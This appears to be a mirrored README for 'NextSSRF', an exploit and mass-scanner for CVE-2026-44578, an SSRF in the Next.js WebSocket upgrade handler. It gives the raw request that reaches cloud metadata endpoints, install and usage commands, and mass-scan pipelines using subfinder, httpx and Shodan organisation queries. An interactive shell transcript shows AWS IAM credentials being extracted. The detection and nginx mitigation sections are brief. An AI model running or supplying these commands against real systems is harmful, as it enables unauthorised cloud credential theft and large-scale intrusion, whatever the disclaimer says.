Share
## https://sploitus.com/exploit?id=3E4275D3-0547-519B-A6B4-38321844D41A
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ NextSSRF โ CVE-2026-44578 Scanner & Exploit โ
โ Next.js WebSocket Upgrade Handler SSRF โ
โ Affected: 13.4.13 โ 15.5.15, 16.0.0 โ 16.2.4 โ
โ @gadalubau1337 โ Bug Bounty Tooling โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```





**CVE-2026-44578** โ Server-Side Request Forgery via Next.js WebSocket Upgrade Handler
[Overview](#overview) ยท [Install](#install) ยท [Usage](#usage) ยท [Pipeline](#pipeline) ยท [Shodan](#shodan) ยท [Interactive](#interactive-shell) ยท [Disclaimer](#disclaimer)
---
## Overview
On May 11, 2026, Vercel patched **CVE-2026-44578** (CVSS 8.6): an unauthenticated SSRF in Next.js's WebSocket upgrade handler affecting all self-hosted deployments from **13.4.13** onward.
### Mechanism
```
GET http://169.254.169.254/latest/meta-data/ HTTP/1.1 โ absolute-form URI
Host: vulnerable-nextjs.com
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
```
The `//` in `http://` triggers `normalizeRepeatedSlashes` early-exit, setting `statusCode: 308` and `finished: true`. The vulnerable upgrade handler **ignores both flags** and calls `proxyRequest` when `parsedUrl.protocol` is truthy โ proxying the request to the attacker-controlled host on **port 80**.
```diff
// router-server.ts (vulnerable)
- if (parsedUrl.protocol) {
- return await proxyRequest(req, socket, parsedUrl, head)
+ if (finished && parsedUrl.protocol) {
+ if (!statusCode) {
+ return await proxyRequest(req, socket, parsedUrl, head)
```
### Affected Versions
| Product | Vulnerable | Fixed |
|-----------------|--------------------|----------|
| Next.js | 13.4.13 โ 15.5.15 | 15.5.16 |
| Next.js | 16.0.0 โ 16.2.4 | 16.2.5 |
| Vercel-hosted | โ
NOT affected | N/A |
### Limitations
- **GET only** (no POST/PUT)
- **Port 80 only** (explicit ports stripped by URL normalization)
- AWS **IMDSv2** not exploitable (requires PUT token)
- GCP metadata rejects `Upgrade: websocket` with 400
- Reverse proxies (nginx/caddy/HAProxy) block absolute-form URIs
---
## Demo

> AWS IMDSv1 credentials exfiltrated via CVE-2026-44578 โ interactive exploit shell
---
## Install
```bash
git clone https://github.com/ynsmroztas/nextssrf
cd nextssrf
python3 nextssrf.py -t https://target.com
```
> **Zero dependencies** โ Python stdlib only. Python 3.10+ required.
---
## Usage
### Single Target Scan
```bash
python3 nextssrf.py -t https://target.com
```
### Cloud-Specific Targeting
```bash
# AWS metadata only
python3 nextssrf.py -t https://target.com --cloud aws
# Custom internal target
python3 nextssrf.py -t https://target.com \
--ssrf-host http://internal-api --path /admin
# Deep scan (+ internal services)
python3 nextssrf.py -t https://target.com --cloud aws --deep
```
### Mass Scan (Pipeline)
```bash
# subfinder + httpx + nextssrf
subfinder -d target.com | httpx -silent | \
python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl
# File input
python3 nextssrf.py -f targets.txt --threads 15 -o results.json
# Force scan (even if version unknown)
python3 nextssrf.py -t https://target.com --force
```
### Exit Codes
| Code | Meaning |
|------|------------------------|
| `0` | Not vulnerable / clean |
| `1` | Vulnerable (no exploit)|
| `2` | SSRF confirmed |
---
## Interactive Shell
Advanced exploit shell with auto cloud detection and IAM credential extraction:
```bash
python3 nextssrf.py -t https://target.com
```
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ NextSSRF v2 โ Interactive Exploit Shell โ
โ Target : ec2-x-x-x-x.compute.amazonaws.com โ
โ CVE : CVE-2026-44578 | Status: Connected โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
nextssrf(ec2-x...)> cloud
[>] Detecting cloud provider...
โ AWS โ matched: ['ami-id', 'instance-id', 'iam/', 'hostname']
โ Run 'aws' for full credential extraction
nextssrf(ec2-x...)> aws
[1/3] Instance Information
[200] Hostname : ip-172-31-47-134.ec2.internal
[200] AZ : us-east-1d
[200] Account ID : {"AccountId": "370741706736"}
[2/3] IAM Role Discovery
โ IAM Role found: my-ec2-role
[3/3] Credential Extraction
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ AWS CREDENTIALS EXFILTRATED!
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX
SecretKey : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Expiration : 2026-05-14T22:32:22Z
```
### Shell Commands
| Command | Description |
|----------------|------------------------------------------|
| `cloud` | Auto-detect cloud (AWS/Azure/GCP/DO/OCI) |
| `aws` | Full AWS IAM credential chain |
| `azure` | Azure managed identity token |
| `scan` | Cloud detect + auto exploit |
| `url `| Custom SSRF request |
| `get ` | AWS IMDS target by index |
| `list` | Show all IMDS endpoints |
| `history` | Request history |
| `save` | Export session to JSON |
| `quit` | Exit |
### Auto Mode
```bash
# Detect cloud + run full exploit chain automatically
python3 nextssrf.py -t https://target.com --auto
```
---
## Pipeline Examples
```bash
# Full recon โ exploit pipeline
subfinder -d target.com \
| httpx -silent -server \
| grep -i "next" \
| python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl
# Shodan mass scan โ interactive on confirmed hosts
python3 shodan_nextjs.py --key KEY --org "TargetCorp" \
| python3 nextssrf.py --pipe --cloud aws -o hits.jsonl
# Check specific version range
cat hosts.txt \
| python3 nextssrf.py --pipe --force --cloud aws \
| jq '.[] | select(.ssrf_hits | length > 0)'
```
---
## Detection (Blue Team)
Signs of exploitation in logs:
```
# Next.js process logs
Failed to proxy http:/ โ single slash = normalization fingerprint
# Access logs (absolute-form URI + Upgrade header)
GET http://169.254.169.254/... HTTP/1.1
Connection: Upgrade
Upgrade: websocket
```
### Mitigation (if can't patch)
```nginx
# Nginx: reject absolute-form request URIs
if ($request_uri ~* "^https?://") {
return 400;
}
```
---
## References
- [GHSA-c4j6-fc7j-m34r](https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r)
- [NVD CVE-2026-44578](https://nvd.nist.gov/vuln/detail/CVE-2026-44578)
- [Next.js Security Release May 2026](https://nextjs.org/blog/security-release-2026-05)
- [Hadrian Technical Analysis](https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2)
---
## Disclaimer
> **For authorized security testing and bug bounty research only.**
> Use only against systems you own or have explicit written permission to test.
> The authors are not responsible for misuse or unauthorized use.
> Always follow your bug bounty program's rules of engagement.
---
Made with โค๏ธ by [@gadalubau1337](https://github.com/gadalubau1337) ยท [gadalubau1337.github.io](https://gadalubau1337.github.io)
**Top Hacker @ Intigriti ยท 100+ HOF ยท 2430+ Vulnerabilities ยท 1100+ P1 Critical**